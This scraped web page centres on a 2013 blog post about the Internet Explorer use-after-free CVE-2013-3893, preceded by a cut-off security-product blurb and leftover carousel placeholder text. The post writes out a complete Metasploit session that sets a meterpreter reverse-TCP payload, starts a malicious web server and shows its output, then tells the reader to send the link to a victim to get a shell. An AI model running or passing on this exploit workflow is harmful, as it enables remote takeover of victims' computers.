platform; including automated penetration tests and risk assesments culminating in a "cyber risk score" out of 1,000, just like a credit score.
First slide label
Some representative placeholder content for the first slide.
Second slide label
Some representative placeholder content for the second slide.
Third slide label
Some representative placeholder content for the third slide.
Exploit For All IE version(CVE-2013-3893).
published on 2013-10-01 16:37:00 UTC by nirav desai Content:
Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded here.
This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well.
For more technical Detail view metasploit blog here .
The Metasploit module currently can be only tested on Internet Explorer 9 on Windows 7 SP1 with either Office 2007 or Office 2010 installed,
msf > use exploit/windows/browser/ie_setmousecapture_uaf msf exploit(ie_setmousecapture_uaf) > set srvhost 192.168.56.1 srvhost => 192.168.56.1 msf exploit(ie_setmousecapture_uaf) > set uripath / uripath => / msf exploit(ie_setmousecapture_uaf) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ie_setmousecapture_uaf) > set lhost 192.168.56.1 lhost => 192.168.56.1 msf exploit(ie_setmousecapture_uaf) > set lport 443 lport => 443 msf exploit(ie_setmousecapture_uaf) > run [*] Exploit running as background job. [*] Started reverse handler on 192.168.56.1:443 [*] Using URL: http://192.168.56.1:8080/ [*] Server started.
Send this link to victim. As soon as he open link you will get meterpreter shell.